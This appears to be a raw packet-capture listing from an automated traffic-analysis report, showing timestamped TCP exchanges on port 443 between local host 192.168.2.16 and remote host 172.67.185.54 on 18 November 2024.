                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.949260950 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.949450016 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.949474096 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.949516058 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.949527025 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.949553967 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.949573994 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.949865103 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.949914932 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.949951887 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.949968100 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.949990988 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.950017929 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.951948881 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.951988935 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.952049971 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.952061892 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.952090025 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.952181101 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.952581882 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.952604055 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.952671051 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.952677011 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.952734947 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.953241110 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.953286886 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.953305960 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.953310966 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.953342915 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.953361988 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.953474045 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.953515053 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.953548908 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.189851046 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.190447092 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.190478086 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.190500975 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.190505981 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.190529108 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.190546036 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.190869093 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.190881968 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.190927982 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.190932989 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.190990925 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.191643953 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.191673994 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.191708088 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.191714048 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.191766977 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.228183985 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.228219986 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.228272915 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.228305101 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.228332043 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.228349924 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.228698015 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.228718996 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.228777885 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.228790045 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.228837013 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.230168104 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.230186939 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.230232000 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.230242968 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.230268002 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.230289936 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.230554104 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.230572939 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.230631113 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.230643034 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.230667114 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.230685949 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.233042955 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.233064890 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.233114958 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.233136892 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.233181000 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.233181000 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.233196020 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.233208895 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.233256102 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.233738899 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.233762980 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.233822107 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.233834028 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.233880997 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.304749012 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.304773092 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.304898977 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.304915905 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.305151939 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.305577040 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.305598974 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.305669069 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.305680990 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.305737019 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.306190014 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.306210041 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.306278944 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.306291103 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.306340933 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.307789087 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.307823896 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.307862043 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.307873011 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.307913065 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.307931900 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.308150053 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.308166027 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.308237076 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.308248997 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.308300018 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.309010029 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.309024096 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.309094906 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.309104919 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.309154987 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.309684038 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.309698105 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.309762001 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.309773922 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.309843063 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.310313940 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.310328007 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.310393095 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.310403109 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.310456991 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.310714006 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.470834970 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.517218113 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.517247915 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.517352104 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.517364979 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.517443895 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.542181015 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.542198896 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.542279959 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.542293072 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.542352915 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.542368889 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.542387962 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.542438030 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.542448997 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.542484045 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.542506933 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.543138981 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.543154001 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.543224096 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.543236017 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.543288946 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.543570995 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.543584108 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.543700933 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.543713093 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.543764114 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.545270920 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.545283079 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.545355082 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.545366049 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.545414925 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.545809984 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.545821905 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.545886040 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.545898914 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.545952082 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.546308994 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.546335936 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.546377897 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.546387911 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.546418905 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.546447039 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.546870947 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.546885014 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.546951056 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.546962023 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.547012091 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.547444105 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.547456980 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.547528982 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.547538996 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.547595978 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.757183075 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.757203102 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.757291079 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.757316113 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.757373095 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.757775068 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.757791996 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.757860899 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.757874966 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.757922888 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.758286953 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.758302927 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.758372068 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.758383036 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.758435965 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.758733034 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.758745909 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.758816957 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.758829117 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.758879900 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.759212971 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.759224892 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.759295940 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.759306908 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.759360075 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.759757996 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.759778976 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.759848118 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.759859085 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.759922028 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.760163069 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.760175943 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.760247946 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.760260105 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.760315895 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.760654926 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.760668039 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.760750055 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.760761023 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.760812998 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.761163950 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.761178970 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.761261940 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.784502983 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.784518003 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.784573078 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.784584045 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.784636021 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.784992933 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.785006046 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.785072088 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.785083055 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.785137892 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.785311937 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.785330057 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.785387039 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.785398960 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.785425901 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.785445929 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.785842896 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.785861969 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.785927057 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.785938025 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.785990953 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.819031954 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.819077015 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.819114923 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.819135904 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.819165945 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.819185019 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.820875883 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.820889950 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.820951939 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.820964098 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.821017981 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.821580887 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.821595907 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.821664095 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.821676016 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.821732044 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.822169065 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.822182894 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.822242022 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.822252989 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.822309017 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.822801113 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.822815895 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.822879076 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.822890043 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.822942972 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.823385000 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.823401928 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.823466063 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.823477030 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.823525906 CET49717443192.168.2.16172.67.185.54
